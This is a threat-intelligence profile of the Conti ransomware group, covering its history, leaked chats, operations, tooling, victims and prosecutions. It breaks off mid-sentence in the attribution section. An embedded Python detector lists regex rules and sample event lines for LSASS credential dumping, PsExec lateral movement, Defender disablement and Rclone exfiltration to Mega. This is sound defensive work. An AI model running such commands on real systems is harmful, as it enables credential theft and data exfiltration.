Ransomware EDP  •  Threat Actor Library
therenoproject.org  •  Analytical Profiles
Threat Actor Profile  •  Ransomware-as-a-Service
Conti
Wizard Spider / GOLD ULRICK  •  Russia-based  •  Active Dec 2019 – May 2022  •  Diaspora ongoing
Tags: Brand Defunct | Diaspora Active | RaaS (Hybrid) | Critical Infrastructure

Lifetime Revenue: $2.7B (Ryuk/Conti combined est.)
2021 Revenue Alone: $180M (highest of any group that year)
Confirmed Victims: 1,000+ (47 US states + 31 countries)
Peak Workforce: 100+ (salaried employees)
Leaked Messages: 170K+ (internal Jabber logs, 2022)
Known Successors: 6+ (Akira, Black Basta, Royal, others)
01 Executive Summary and Group Overview
Overall Assessment

Conti was the most financially destructive ransomware operation ever documented. Operated by the Russia-based Wizard Spider criminal syndicate, it generated an estimated $180 million in extortion revenue in 2021 alone and accumulated over $2.7 billion across its full operational lifetime (Ryuk and Conti combined). Conti evolved from the TrickBot/Ryuk ecosystem into a full-spectrum Ransomware-as-a-Service empire, run with the organizational structure, HR departments, and professional divisions of a legitimate technology company.

Its implosion in May 2022 was triggered not by law enforcement, but by an internal actor: a Ukrainian security researcher who, incensed by Conti's public declaration of support for Russia's invasion of Ukraine, leaked nearly two years of internal communications. The brand collapsed; the organization did not. Core operators dispersed into a constellation of successor groups including Akira, Black Basta, Royal/BlackSuit, and others that continue operating as of May 2026. Conti is the progenitor of the most consequential criminal diaspora in ransomware history.

Confirmed

The Conti brand is defunct as of May 19, 2022. The core operating network, centered on the individual identified as Vitaly Kovalev (alias "Stern"), remains active through successor entities, with shared laundering infrastructure confirmed by TRM Labs through 2026. [1][4][6]

Quick-Reference Attributes
Status: DEFUNCT (Conti brand, May 2022) / ACTIVE (diaspora entities, 2026)
First Observed: December 2019 (Conti deployments); antecedent Ryuk activity from September 2018
Brand Shuttered: May 19, 2022 (AdvIntel confirmation)
Operator: Wizard Spider (CrowdStrike); GOLD ULRICK (Secureworks, Conti operators specifically)
Origin: Russia (Saint Petersburg assessed; UAE operations hub from ~2020)
Revenue Model: Hybrid RaaS: salaried core employees + limited affiliate revenue-sharing
Max Single Demand: $25 million (documented FBI figure)
Encryption: AES-256 (initial); ChaCha stream cipher (from August 2020, selective)
CIS Exclusion: Confirmed behavioral exclusion; binary kill-switch assessed but less publicly documented than peers
Decryptor Available: Bitdefender free decryptor (limited applicability; pre-key-rotation variants only)
US Reward Outstanding: $10M for leadership ID/location; $5M for arrest/conviction of conspirators
Successor Profiles: Akira | Black Basta (defunct) | Royal/BlackSuit | Karakurt
Operational Timeline
Date | Event
Dec 2019 | First observed Conti deployments, distributed via TrickBot
Jun 2020 | CrowdStrike first observes Conti in Big Game Hunting campaigns; full transition from Ryuk
Aug 2020 | "Conti News" data leak site launched; ChaCha encryption adopted for speed
Oct 2020 | NSA disrupts TrickBot botnet; internal chats document Conti's real-time reaction
Jan 2021 | Emotet international law enforcement takedown forces Conti reorganization
May 2021 | Ireland HSE attack; near-complete shutdown of national health IT network; $20M demand
Aug 2021 | Disgruntled affiliate leaks Conti operational playbook (precursor leak)
Sep 2021 | CISA/FBI/NSA joint advisory; 400+ documented attacks publicly acknowledged
Dec 2021 | Conti is first professional ransomware group to adopt Log4Shell (CVE-2021-44228)
Feb 25, 2022 | Conti posts pro-Russia statement on Ukraine invasion
Feb 27, 2022 | @ContiLeaks begins publishing internal Jabber logs; 60,000+ messages in first tranche
Mar 2022 | Conti source code and TrickBot administrator materials leaked; attacks surge despite leaks
Apr–May 2022 | Costa Rica attacks; first cyberattack to trigger a national state of emergency
May 19, 2022 | Conti brand officially shuttered; all infrastructure taken offline (AdvIntel)
Sep 2023 | DOJ unseals three federal indictments against nine Russian nationals; OFAC/FCDO sanction 11
May 2025 | GangExposed begins publishing identities of Conti/TrickBot leadership; BKA names Kovalev
May 2026 | Deniss Zolotarjovs sentenced to 102 months: first major custodial sentence for Conti network
[Figure: Data Leak Site & Branding]
02 Lineage and Organizational Heritage
Wizard Spider Ecosystem: Lineage Flow
Hermes (2017) → Ryuk (Sep 2018) → Conti (Dec 2019) → Akira / Black Basta / Royal
Ryuk-to-Conti Transition
Confirmed: High Confidence

Conti is a technical evolution of Ryuk ransomware, developed and operated by the same core group that CrowdStrike designates WIZARD SPIDER. CrowdStrike first observed Wizard Spider deploying TrickBot for financial fraud in 2016; the group deployed Ryuk in September 2018 for large-scale big game hunting; and between March and June 2020 the group completed its transition to Conti. The Ryuk-Conti-Wizard Spider lineage is corroborated by independent code analysis from multiple vendors, blockchain forensics from TRM Labs, personnel overlap documented in leaked chats, and infrastructure continuity across all three phases. No credible vendor disputes this lineage. [2][9][22]

Evidentiary Pillar 1: Code Overlap
Security analysts identify Conti as a technical evolution of Ryuk, maintaining similar obfuscation techniques while introducing a faster, multi-threaded encryption engine. The Conti source code leaked in March 2022 allowed researchers to confirm shared architecture with Ryuk. Avast Threat Labs later identified Conti code similarities in Akira, extending the lineage forward. [8][9]
Evidentiary Pillar 2: Personnel Continuity (Leaked Chats)
Senior Conti developer identified as "Professor" (subsequently identified as Vladimir Kvitko) remarked upon reading a security firm's Ryuk analysis: "adf.bat: this is my fucking batch file," confirming direct overlap between the Ryuk and Conti development teams. BleepingComputer's Lawrence Abrams summarized: "Feels like same managers were running both Ryuk and Conti, with a slow migration to Conti in June 2020. However, based on chats, some affiliates didn't know that Ryuk and Conti were run by the same people." [23]
Evidentiary Pillar 3: Blockchain Forensics (TRM Labs)
TRM Labs' on-chain analysis found that funds for salaries paid by a core Conti member were derived from a known Ryuk ransomware address. On-chain salary wallet mapping corroborated both the Conti-Ryuk tie and, separately, links between Conti and successor group laundering infrastructure through 2026. [22][4]
Evidentiary Pillar 4: Infrastructure Continuity
Conti was distributed through the same TrickBot and Emotet ("Booz"/"Buza") infrastructure used by Ryuk. Chat logs confirm shared access to the Emotet platform and show Conti leadership gradually absorbing full operational control of TrickBot, BazarLoader, and Emotet infrastructure. By the time Conti shuttered, it had become a cybercrime syndicate rather than a simple ransomware operation. [23][24]
Vendor Designation Disambiguation

Critical Rule: WIZARD SPIDER (CrowdStrike) and GOLD ULRICK (Secureworks) are distinct designations applied at different organizational levels. WIZARD SPIDER covers the umbrella criminal organization; GOLD ULRICK specifically designates the Conti ransomware operators. These must not be conflated. Mandiant's UNC1878 covers Wizard Spider broadly and predates the Conti era.

Vendor | Designation | Scope
CrowdStrike | WIZARD SPIDER | Umbrella organization; Conti is a WIZARD SPIDER capability/sub-operation
Secureworks | GOLD ULRICK | Conti ransomware operators specifically (not the broader Wizard Spider entity)
Mandiant | UNC1878 | Wizard Spider parent organization; predates Conti era, applied broadly
Palo Alto Unit 42 | Conti Ransomware Gang | Tracked as part of "Ransom Cartel" ecosystem; no distinct proprietary name
Recorded Future | Conti | Rated second most prolific ransomware as of June 2024 tracker
Microsoft | TrickBot Group / Conti | No widely published distinct Microsoft-proprietary designation

Note: Secureworks uses GOLD BLACKBURN for broader TrickBot-related criminal activity. Researchers should verify which designation a given vendor report is applying before drawing cross-vendor comparisons.

03 The Conti Leaks
Confirmed: Primary Source Material

The Conti Leaks constitute the most comprehensive exposure of a criminal organization in cybersecurity history. The events unfolded across two major waves, beginning on February 27, 2022, and produced materials that form the evidentiary backbone for the majority of definitive Conti analysis. What follows is the authoritative account of the leak sequence and its investigative significance. [1][2][10]

Precursor: The Affiliate Playbook Leak (August 2021)

Prior to the major 2022 leaks, a disgruntled Conti affiliate leaked the group's operational playbook in August 2021, revealing step-by-step intrusion procedures, tool preferences, and exploitation techniques. This prompted the September 2021 CISA/FBI/NSA joint advisory. The playbook leak was an early warning of internal tensions, particularly between affiliates who felt their treatment or revenue share was inadequate relative to the core team's salaried model. [11][43]

First Wave: Jabber Logs (February 27, 2022)

The catalytic event was Conti's February 25, 2022 public statement of support for Russia's invasion of Ukraine:

"The Conti Team is officially announcing a full support of Russian government... If anybody will decide to organize a cyberattack or any war activities against Russia, we are going to use all our possible resources to strike back at the critical infrastructures of an enemy."

Conti public statement, February 25, 2022

Within 48 hours, on February 27, 2022, a new Twitter account @ContiLeaks began publishing internal Jabber/XMPP chat logs. According to Brian Krebs and Hold Security founder Alex Holden, the leaker was a Ukrainian security researcher acting on patriotic motivation: "The person releasing this is a Ukrainian and a patriot. He's seeing that Conti is supporting Russia in its invasion of Ukraine, and this is his way to stop them in his mind at least." [10]

The initial leak contained 339 JSON files covering January 29, 2021 to February 27, 2022. Subsequent releases extended coverage back to the period June 22, 2020 through November 16, 2020, bringing the total to over 170,000 internal chat messages. [2][24]

What the Leaks Revealed: The Krebs Four-Part Series

Krebs on Security published a landmark four-part investigative series based entirely on the leaked logs, constituting the definitive public analysis of Conti's internal operations:

  • Part I: Evasion. How Conti detected and responded to law enforcement operations. Internal reaction when the NSA compromised TrickBot in September 2020 ("The one who made this garbage did it very well... It's just some kind of sabotage." - leader "Hof"). Crucially: Russian investigators were aware of the TrickBot/Conti investigation but had assured the group the inquiry would be closed by mid-November 2021. [10]
  • Part II: The Office. Day-to-day operations, HR practices, salaries, and organizational structure. Documented pervasive burnout, employees pleading for time off, and leaders demanding 24/7 availability. Annual summer vacations in Crimea. Conti's effort to fund legal defense for arrested TrickBot coder Alla Witte, and the cynical suggestion to leverage that relationship for inside intelligence: "Let's try to find a way to her lawyer right now and offer him to directly sell the data bypassing her." [10][23]
  • Part III: Weaponry. Conti's $60,000 legitimate Cobalt Strike license acquisition (via a $30,000 front company payment). Subscriptions to Crunchbase Pro and ZoomInfo for victim research. EDR tools (CrowdStrike Sentinel, Cylance) used to surveil its own administrators. A corrupt recovery firm negotiator nicknamed "The Spaniard" (described as Romanian, working for a large Canadian recovery firm). A journalist on payroll for 5% of payments to pressure non-paying victims. [23]
  • Part IV: Cryptocrime. Founder Stern's obsession with building a proprietary peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot. A $100,000 writing contest on Exploit forum to solicit crypto platform ideas. Evidence of involvement in the SQUID pump-and-dump of October 2021. DDoS-based crypto market manipulation. [40]
Second Wave: Source Code and TrickBot Materials (March 2022)

On March 2, 2022, @ContiLeaks posted fresh logs, demonstrating the infiltrator retained access to infrastructure Conti had not detected. A separate account, @TrickBotLeaks, posted names, photos, and personal information of TrickBot administrators before being suspended within 24 hours.

The full leaked corpus included: 60,000+ internal Jabber messages (first tranche); full Conti Locker v2 source code; administrator panel source code; decryptor tool source code; Bitcoin addresses and wallet data; negotiation logs; infrastructure documentation; phishing templates; HR materials; and screenshots of the live Conti control panel with compromised host telemetry. [1][30][44]

Immediate Operational Impact
Confirmed

The leaks initially had minimal operational impact. Secureworks (GOLD ULRICK tracking) noted that Conti victim postings actually increased in March 2022, reaching the second-highest monthly total since January 2021. The deeper damage was reputational and jurisdictional: the Conti brand became toxic for affiliates; victims paying Conti risked OFAC sanctions exposure; and the $15 million U.S. government bounty announced in May 2022 made the brand operationally untenable. The organization's response was strategic dissolution rather than destruction. [13][15][41]

The GangExposed Intelligence Operation (May 2025)

In May 2025, a figure operating as GangExposed launched what The Register described as a "high-stakes intelligence war" against Conti's former leadership. GangExposed published detailed dossiers using OSINT, darknet database purchases, and claimed access to a leaked FSB border control database acquired for approximately $250,000. [18][19]

Alias | Real Name (GangExposed) | BKA/DOJ Corroboration | Current Status
Stern / Ben / Demon | Vitaly Nikolaevich Kovalev, 36 (Russian) | Confirmed by BKA May 2025; Interpol Red Notice issued | At large in Russia; net worth assessed >$500M crypto
Professor | Vladimir Viktorovich Kvitko, 39 (Russian; relocated to Dubai ~2020) | US Rewards for Justice; $10M bounty; "burned" by GangExposed publication | Dubai; assessed actively involved in ongoing operations
Target | Unidentified (State Dept photo released Aug 2022) | $10M US bounty; identity not yet publicly confirmed | At large
Mango | Mikhail Mikhailovich Tsaryov | DOJ indictment (Sep 2023); GangExposed corroboration | At large in Russia
Defender | Andrey Yuryevich Zhuykov | DOJ indictment; UK NCA sanction (Sep 2023) | At large in Russia
Credible

GangExposed's methodology and identity remain unverified. The Kovalev identification is treated as CONFIRMED given independent BKA corroboration; the other identifications are rated CREDIBLE. Technisanct/FalconFeeds assessed that the source likely has insider access, while other researchers assessed that GangExposed could be a former criminal burning former associates. GangExposed's stated goals were to identify all ~50 key participants, disrupt the Blockchain Life crypto legitimization scheme, and deprive operators of their UAE safe haven. [18]

04 Operational Model
Hybrid RaaS Structure: The Salaried Core
Confirmed

Conti operated a hybrid model unique among ransomware groups. CISA noted in its September 2021 advisory: "It is likely that Conti developers pay the deployers of the ransomware a wage rather than a percentage of the proceeds from a successful attack." The leaked chats confirmed this assessment: Conti maintained a dedicated, salaried workforce of 65–100+ employees paid bimonthly in Bitcoin, with limited external affiliate participation for specific access-broker roles.

Most low-level employees (testers, coders, administrators) earned $1,000–$2,000/month. High-performing coders could earn $5,000–$10,000/month. Senior managers confirmed to Stern on July 18, 2021 that the group employed 62 people; by July 30, payroll had grown to 87. [10][11][23]

Internal Organizational Structure

The leaked chats documented a corporate-like internal structure with departments, separate budgets, and staff schedules:

  • Coders: Programmers writing malicious code and integrating new capabilities
  • Testers: Workers testing Conti malware against antivirus products, checking every ~4 hours for new Windows Defender updates
  • Administrators: Infrastructure setup, teardown, VPN and server maintenance
  • Reverse Engineers ("Reversers"): Disassembling code, studying commercial security products, finding vulnerabilities
  • Penetration Testers / Hackers: Front-line operators conducting network intrusions
  • OSINT Team: Using Crunchbase Pro, ZoomInfo, SignalHire, Shodan, and Spiderfoot Pro for victim research and financial intelligence
  • HR Department: Actively recruiting from Russian job boards (including legitimate employment platforms) and cybercrime forums; reviewing 25–35% of relevant CVs on employment platforms

The leaked chats also document relationships with external access brokers, who were paid 25–30% of ransom proceeds for specific network access; leadership considered this arrangement suboptimal because of the cut it took from profit margins. [23]

Targeting Strategy: Big Game Hunting

Conti practiced "big game hunting" exclusively, targeting organizations with over $100 million in annual revenue. Ransom demands were typically set as a percentage of the victim's annual revenues. Operators used Crunchbase Pro and ZoomInfo to research victims' insurance coverage, earnings, and investor contacts for leverage. [10][23]

Negotiation Model and Double Extortion
Element | Detail
Ransom range | Up to $25 million per incident (single-victim maximum, FBI documented)
Reduction behavior | Reductions common; experienced negotiators could bring demands down substantially (e.g., sub-$100M revenue companies sometimes capped near $1M)
Payment deadline | Countdown timer on victim's dark web page; expiry triggered automatic data publication
Communication channels | Dark web negotiation portal; ProtonMail; VoIP calls
Corrupt insider negotiator | "The Spaniard" (Romanian, large Canadian recovery firm): maintained sympathetic relationship, shared victim internal deliberations with Conti operators
Journalist on payroll | As of March 2021, "Alarm" claimed access to a journalist who would write pressure articles against non-paying victims for 5% of payout
Double extortion | Primary demand for decryption key; separate demand for data non-publication. Paying for decryption did NOT guarantee data destruction
HSE precedent | Ireland HSE provided free decryptor after refusal to pay, but Conti reserved right to publish stolen data. Demonstrates keys and data are separate extortion levers
05 Technical Capabilities
Initial Access Vectors
Vector | Detail | Period
TrickBot infections | Primary initial vector through 2021; distributed via malspam | 2019–2021
BazarLoader / BazarBackdoor | Replaced TrickBot as primary delivery by March 2021 as TrickBot detections improved | 2021–2022
Spear-phishing (malicious Excel) | Macros or links to Google Drive-hosted malware; IcedID dropper files also used | Throughout
CVE-2018-13379 | FortiGate SSL VPN path traversal; widely exploited across ransomware groups | Throughout
ProxyShell chain | CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 | Aug 2021+
Log4Shell | CVE-2021-44228; Conti first professional group to weaponize; targeted VMware vCenter | Dec 13, 2021+
PrintNightmare | CVE-2021-1675 | Referenced in CISA/FBI/NSA advisory
Stolen/weak RDP credentials | Sourced from access brokers and credential markets | Throughout
Fake software / SEO poisoning | Documented in CISA advisory | 2021+

Log4Shell First-Mover Significance: AdvIntel confirmed Conti was the first professional ransomware operation to adopt and embed CVE-2021-44228 in their attack chain, beginning December 13, 2021, targeting VMware vCenter servers. Within days, the attack chain extended to Emotet deployment followed by Cobalt Strike. This first-mover capability was a consistent Conti signature: rapid weaponization of critical CVEs before patching could occur at scale.

Post-Exploitation and Lateral Movement
  • Cobalt Strike: $60,000 legitimate license acquired via front company. Used for network reconnaissance, lateral movement, and in-memory payload execution.
  • Mimikatz / LSASS credential dumping: Privilege escalation; overpass-the-hash Kerberos ticket acquisition documented in DFIR case studies.
  • BumbleBee loader: Replaced BazarLoader in later operations (2022).
  • SystemBC: Proxy/C2 tunneler for persistent access.
  • PsExec + SMB: Lateral movement to distribute Cobalt Strike beacons across domain-joined systems.
  • AnyDesk / RDP: Legitimate remote access tools for persistence; RDP sometimes proxied through IcedID process.
  • GPO modification: Used to disable Windows Defender across domain; force-updated via Cobalt Strike beacon.
  • Rclone / Mega.nz / dedicated VPS: Data exfiltration tooling; Rclone to cloud storage and purpose-built VPS instances for high-volume exfiltration.

The Conti playbook leak revealed a highly professional approach to dwell time: operators spent weeks inside networks before deploying ransomware. The Ireland HSE attack illustrates this: initial access on March 18, 2021, via a malicious Excel attachment; ransomware detonation not until May 14, 2021, eight weeks later, during which attackers moved across 180 systems and multiple domains. [37]
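As an added example (not from the page, the leaked playbook, or any vendor's product), the following Python runs detection rules for the post-exploitation behaviours listed above (LSASS dumping, PsExec lateral movement, Defender disablement, GPO force-update, AnyDesk installation, Rclone transfers) over constructed Sysmon-style process-creation events, and escalates a host once several intrusion stages cluster inside a time window, which is the pre-encryption dwell-time period defenders have to act in. Rule names, regex patterns, event fields, the window and threshold values, and all sample events are assumptions.

```python
"""Stage-clustering detection for the Conti post-exploitation chain.

Added example: rule names, regexes, event fields and the sample events are
all constructed for illustration and are not taken from any vendor product.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, intrusion stage, regex applied to "image | cmdline | parent")
RULES = [
    ("lsass_dump", "credential_access",
     re.compile(r"procdump.*lsass|comsvcs\.dll.*minidump|mimikatz|sekurlsa", re.I)),
    ("psexec_lateral", "lateral_movement",
     re.compile(r"\\psexec(64)?\.exe|psexesvc\.exe", re.I)),
    ("defender_disable", "defense_evasion",
     re.compile(r"Set-MpPreference.*-Disable|DisableAntiSpyware|DisableRealtimeMonitoring", re.I)),
    ("gpo_force_update", "defense_evasion",
     re.compile(r"gpupdate(\.exe)?\s+/force", re.I)),
    ("anydesk_install", "persistence",
     re.compile(r"anydesk\.exe.*--install", re.I)),
    ("rclone_transfer", "exfiltration",
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\s", re.I)),
]
STAGE_OF = {name: stage for name, stage, _ in RULES}

# Constructed sample telemetry (Sysmon event 1 style). SRV01 shows the chain;
# WKS07 shows a lone admin gpupdate that must not escalate on its own.
SAMPLE_EVENTS = [
    {"host": "SRV01", "time": "2021-04-02T09:10:00", "parent": "cmd.exe",
     "image": r"C:\Tools\procdump.exe",
     "cmdline": r"procdump.exe -ma lsass.exe C:\Temp\l.dmp"},
    {"host": "WKS07", "time": "2021-04-02T09:12:00", "parent": "explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n"},
    {"host": "SRV01", "time": "2021-04-02T09:40:00", "parent": "cmd.exe",
     "image": r"C:\Tools\PsExec64.exe",
     "cmdline": r"PsExec64.exe \\FS02 -s -d cmd /c C:\Windows\Temp\b.bat"},
    {"host": "SRV01", "time": "2021-04-02T10:05:00", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WKS07", "time": "2021-04-02T10:30:00", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\gpupdate.exe", "cmdline": "gpupdate.exe /force"},
    {"host": "SRV01", "time": "2021-04-02T10:50:00", "parent": "cmd.exe",
     "image": r"C:\Users\Public\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
    {"host": "SRV01", "time": "2021-04-02T11:30:00", "parent": "cmd.exe",
     "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance mega:exfil --transfers 32"},
]


def match_rules(event):
    """Return the names of every rule the event triggers (may be empty)."""
    haystack = " | ".join((event["image"], event["cmdline"], event["parent"]))
    return [name for name, _stage, rx in RULES if rx.search(haystack)]


def stages_by_host(events, window=timedelta(hours=24)):
    """Map host -> set of intrusion stages seen within `window` of that host's first hit.

    A hit outside the window starts a new sequence, so stale activity does not
    inflate a host's score. Conti dwell times ran to weeks, so `window` should be
    tuned to the environment's log retention rather than left at one day.
    """
    first_hit, stages = {}, defaultdict(set)
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO timestamps sort lexically
        hits = match_rules(ev)
        if not hits:
            continue
        t = datetime.fromisoformat(ev["time"])
        if ev["host"] not in first_hit or t - first_hit[ev["host"]] > window:
            first_hit[ev["host"]] = t
            stages[ev["host"]] = set()
        stages[ev["host"]].update(STAGE_OF[name] for name in hits)
    return dict(stages)


def escalate(events, threshold=3):
    """Hosts showing at least `threshold` distinct stages: treat as pre-encryption activity."""
    return sorted(h for h, s in stages_by_host(events).items() if len(s) >= threshold)


if __name__ == "__main__":
    for host, seen in stages_by_host(SAMPLE_EVENTS).items():
        print(host, sorted(seen))
    print("escalate:", escalate(SAMPLE_EVENTS))
```

Any single rule here will fire on legitimate administration (gpupdate, rclone backups); the value is in the stage clustering, which mirrors the weeks-long chain the HSE timeline above describes.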

Encryption Implementation
  • Algorithm: AES-256 (initial); ChaCha stream cipher adopted August 2020 for selective, high-speed file encryption.
  • Throughput: Multi-threaded engine using up to 32 simultaneous CPU threads. ZDNet documented Conti as using "32 simultaneous CPU threads for blazing-fast encryption" (July 2020).
  • Key management: Asymmetric RSA wrapper around symmetric session key; public key embedded in binary, private key held by attackers.
  • Variants: Encrypted file extension .ODMUA in some documented variants; ransom note named CONTI_README.txt.
  • Decryptor: Bitdefender released a free Conti decryption tool after source code leak; applicability limited to variants encrypted before certain key rotation events.
CIS Exclusion
Confirmed (behavioral); Credible (binary-level implementation)

Conti's consistent avoidance of CIS-region targets across more than 1,000 confirmed attacks, with no known exceptions, is an operational signature consistent with an implicit non-prosecution understanding with Russian authorities. Binary analysis indicates Conti checks for Russian keyboard layout installation as a kill switch, consistent with the standard CIS-exclusion pattern used by other Russia-based groups. The behavioral exclusion is documented across all major sector-targeting data; the specific binary implementation details are less publicly documented than peers such as REvil. [9]

Linux / VMware ESXi Variant

Conti developed a dedicated Linux/ESXi variant targeting VMware virtual machine infrastructure, consistent with the group's enterprise-focused targeting. This variant was documented by SentinelOne and became a direct template for successor groups. Akira inherited the Conti ESXi playbook and extended it with additional VMware-targeting capabilities documented in joint FBI/CISA advisories. [39]

06 Financial Infrastructure
Revenue and Cryptocurrency Operations
Confirmed

Conti demanded payment exclusively in Bitcoin (BTC). Chainalysis identified Conti generating at least $180 million in 2021, the highest of any ransomware group that year. Total lifetime revenue across Ryuk/Conti operations is assessed at approximately $2.7 billion. The UK NCA and Chainalysis jointly assessed Conti and TrickBot attempted to extort more than $800 million from victims including hospitals, schools, local authorities, and businesses. [5][17][40]

  • Payroll: $1,000–$2,000/month for most employees; $5,000–$10,000 for senior coders; distributed in Bitcoin bimonthly
  • Ransom receipts: Single highest documented payment: $25M; Ireland HSE demanded $20M (not paid)
  • Costa Rica: $20M demand; government refused; no payment made
On-Chain Laundering and Financial Schemes

Krebs on Security's deep analysis of leaked chats (Part IV: Cryptocrime) documented extensive laundering and investment schemes directed personally by founder "Stern" (Kovalev): [40]

  • Proprietary crypto platform: Kovalev was developing a peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot with integrated NFT, DeFi, and DEX functionality, intended as a vehicle to legitimize illicit proceeds.
  • $100,000 crypto article contest: Sponsored on the Russian-language Exploit cybercrime forum to solicit intellectual property for the platform while simultaneously serving as criminal recruitment.
  • SQUID pump-and-dump: Evidence in chat logs suggests Conti involvement in the October–November 2021 SQUID token scam, which appreciated from $0.01 to $2,856 before the developers extracted approximately $3.38 million.
  • DDoS-driven crypto manipulation: An internal scheme involving DDoSing small cryptocurrency mining pools, then posing as distressed users in Discord to drive prices down before purchasing.
  • Blockchain Life Forum: GangExposed's 2025 investigation revealed Kovalev and associate Khitrov organized the "Blockchain Life" forum as a legitimization vehicle for illicitly obtained cryptocurrency earnings.
Blockchain Forensics: TRM Labs and Chainalysis
Confirmed (TRM Labs 2022; extended to diaspora 2026)

TRM Labs corroborated Conti-Ryuk blockchain ties through salary wallet analysis and on-chain transaction mapping, confirming shared financial infrastructure across both phases of Wizard Spider ransomware operations. In a separate 2023 analysis, TRM documented Conti's re-emergence as three successor groups. TRM Labs' 2026 reporting on Akira specifically confirmed that Conti's successor ecosystem (including Akira) continued sharing laundering infrastructure, providing blockchain continuity evidence linking the diaspora to the original Conti network. [22][4]

07 Victim Profile and Targeting
Scale
  • Over 1,000 attacks confirmed globally (FBI/CISA advisory, updated)
  • DOJ 2023 indictment figures: more than 900 victims in approximately 47 U.S. states, D.C., Puerto Rico, and approximately 31 foreign countries
  • $180M revenue in 2021 alone (Chainalysis); ~$2.7B total (Ryuk/Conti lifetime)
  • Over $150M in ransom payments per State Department figures at time of $15M reward announcement
Sector Targeting

Conti deliberately focused on sectors with low tolerance for downtime and high pressure to pay. Healthcare was the most systematically targeted sector; the FBI documented at least 16 Conti attacks on U.S. healthcare and first-responder networks by May 2021 alone.

Sector | Targeting Priority | Rationale
Healthcare / Hospitals | Highest | Life-critical downtime pressure; low tolerance for delay; data sensitivity
Emergency Services / First Responders | High | 911 dispatch, EMS; non-negotiable uptime dependency
Government (local/national) | High | Political pressure to restore services; large IT budgets imply capacity to pay
Education | Moderate-High | Student/staff data leverage; large datasets
Critical Infrastructure | Moderate-High | Utilities, transportation; operational impact amplifies ransom pressure
Private Enterprise ($100M+ revenue) | High (policy minimum) | Big game hunting threshold; all commercial targets filtered by revenue floor
Geographic Distribution

Primary targets concentrated in North America (~75% U.S.-based per early FBI figures). Significant European targeting documented (UK: 149 known victims, £27 million extracted per NCA). Consistent behavioral exclusion of CIS-region targets across all documented attacks. [17][28]

High-Profile Victims
Victim | Date | Impact | Notable Detail
Ireland HSE (Health Service Executive) | May 2021 | Near-complete shutdown of national health IT; cancer screenings and appointments canceled; 80%+ encryption | Cost estimated >$600M to remediate. Conti provided free decryptor after government refusal to pay $20M demand, but threatened data publication. First access: March 18, 2021 via malicious Excel attachment. Eight weeks of dwell time before detonation. [12][23]
Government of Costa Rica | Apr–May 2022 | ~30 government institutions including Ministry of Finance; national state of emergency declared | First cyberattack to trigger a national emergency declaration globally. $20M demand; government refused. Used as cover for Conti brand dissolution. [14][42]
Broward County Public Schools | Mar 2021 | School district encrypted; $40M ransom demand; threat to release student data | Notable for targeting of minors' educational records as leverage
Scripps Health (California) | May 2021 | Major California health system; patient care disrupted | Specific DOJ indictment filed against Maksim Galochkin for this attack [16]
Advantech | Nov 2020 | Industrial IoT manufacturer; 3 GB of data stolen | Early high-profile Conti DLS posting [24]
City of Tulsa | May 2021 | Government network compromise | Named in BleepingComputer reporting [24]
08 Law Enforcement and Regulatory Response
Federal Indictments (September 2023)
Confirmed

On September 7, 2023, the DOJ unsealed three federal indictments across three jurisdictions, charging nine Russian nationals:

Jurisdiction | Charges | Max Penalty | Named Defendants
N.D. Ohio (TrickBot conspiracy) | Conspiracy to violate CFAA; wire fraud conspiracy; money laundering conspiracy | 62 years | Galochkin, Rudenskiy, Tsarev, Zhuykov, Putilin, Loguntsov, Mikhaylov, Karyagin, Khaliullin
M.D. Tennessee (Conti conspiracy) | Conspiring to use Conti ransomware against U.S. targets 2020–Jun 2022 | 25 years | Galochkin, Rudenskiy, Tsarev, Zhuykov
S.D. California (Scripps Health) | Specific attack on Scripps Health May 1, 2021; impaired medical care | 20 years | Maksim Galochkin specifically

All named defendants remain at large in Russia as of May 2026. [16]

Prior and Subsequent Apprehensions
Individual | Role | Action | Outcome
Alla Witte | TrickBot programmer (Latvian national) | Arrested 2021; charged | Pleaded guilty to conspiracy to commit computer fraud; sentenced to 32 months, June 2023
Vladimir Dunaev | TrickBot developer (Russian national) | Arrested; in U.S. custody in Cleveland | Pending trial as of 2024
Deniss Zolotarjovs | Conti-linked organization (Latvian, based Moscow); operated under Conti, Karakurt, Royal, TommyLeaks, SchoolBoys, Akira brands | Arrested in Georgia Dec 2023; extradited to U.S. | Pleaded guilty July 2025 to conspiracy to commit money laundering and wire fraud; sentenced to 102 months May 2026. First major custodial sentence in Conti network. [6][47]
OFAC and UK FCDO Sanctions (September 2023)
Confirmed

The U.S. OFAC and UK FCDO simultaneously sanctioned 11 Russian nationals connected to Conti and TrickBot: Andrey Zhuykov, Maksim Galochkin, Maksim Rudenskiy, Mikhail Tsarev, Dmitry Putilin, Maksim Khaliullin, Sergey Loguntsov, Vadym Valiakhmetov, Artem Kurov, Mikhail Chernov, and Alexander Mozhaev. Sanctions prohibit financial transactions and enable asset seizure by U.S. and UK governments. [17]

Government Advisories and Rewards
  • May 2021: FBI alert specifically warning healthcare sector; 16 attacks on healthcare/first responder networks documented
  • September 2021: Joint CISA/FBI/NSA advisory documenting 400+ attacks, TTPs, and mitigations
  • May 2022: State Department Rewards for Justice: up to $10M for Conti leadership identification/location; up to $5M for arrest/conviction
  • August 2022: Rewards for Justice expanded: five specific operators named; photograph of "Target" released publicly
  • May 2025: BKA Germany names Vitaly Kovalev as Conti/TrickBot founder; Interpol Red Notice issued
09 Attribution and State Nexus
Credible-to-High: Implicit State Toleration. Formal tasking: Unconfirmed.
Direct Evidence from Leaked Chats

The leaked Jabber logs contain the most direct documentation of Conti's communication with Russian law enforcement available in open-source reporting. In October 2021, Conti member "Kagas" wrote to Stern:

